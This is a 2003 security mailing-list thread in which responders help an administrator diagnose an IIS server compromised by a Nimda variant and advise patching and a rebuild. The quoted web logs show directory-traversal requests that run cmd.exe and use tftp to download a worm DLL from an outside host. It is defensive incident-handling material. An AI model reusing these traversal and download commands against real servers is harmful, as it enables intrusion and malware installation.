Rogelio,

on Nimda.E from Symantec:
This worm is similar in functionality to W32.Nimda.A@mm. Differences include
the modification of file names used by the worm.
The attachment received has been changed to: Sample.exe
The dropped .dll file is now: Httpodbc.dll
The worm now copies itself to the \%Windows% folder as Csrss.exe instead
of Mmc.exe

Try looking for c:\winnt\csrss.exe for the virus.

Also, this isn't where the ncx99.exe came from. I'd do a thorough search for
any usage of cmd.exe/root.exe in your web logs and start there, after taking
it offline.

hth,
sunzi
----- Original Message -----
From: "Michael Katz" <mike (at) procinct (dot) com [email concealed]>
To: <incidents (at) securityfocus (dot) com [email concealed]>
Cc: "Rogelio Vidaurri Courcelle" <rvidaurri (at) haciendachiapas.gob (dot) mx [email concealed]>
Sent: Sunday, January 12, 2003 9:20 PM
Subject: Re: Hacked web server

> At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
>
> >Hi... my web server (NT 4.0 SP6a) was hacked last friday
>
> Rogelio,
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+dir,
>
> The above shows that your server is susceptible to a vulnerability
detailed
> in Microsoft Security Bulletin MS00-057
> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This
> vulnerability is NOT fixed by Service Pack 6a. You need to install
> additional patches for IIS. When you rebuild the server, you should
> install the cumulative IIS patch described in Microsoft Security Bulletin
> MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp)
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
>
> Your failure to find a virus (httpodbc.dll) on your hard disk may indicate
> that your firewall was configured properly or that antivirus software
> prevented the infected file from being written to your hard disk (if you
> had antivirus software with relatively current definitions). However,
> there are plenty of other bad things that could be on your system that
> attackers could have placed on your system that would not be flagged as
> malware by antivirus software.
>
> >i have read that it could be because of Nimda but i have scanned with
> >the latest pattern and it found no viruses... only a backdoor trojan
> >called ncx99.exe dropped in mailroot\drop\temp
> >by the way, can i delete files inside that folder??? there's a
> >rundlls32.exe... a KEY file, etcetera......
>
> ncx99.exe is most likely a modified version of netcat and is not flagged
by
> most antivirus software as malware.
>
> If your machine has been configured this way for two months, you should
> rebuild it and start from scratch. Who knows what attackers may have done
> to your system?
>
>
> Michael Katz
> mike (at) procinct (dot) com [email concealed]
> Procinct Security
>
>
> ------------------------------------------------------------------------
--
--
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>

------------------------------------------------------------------------
----
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

[ reply ]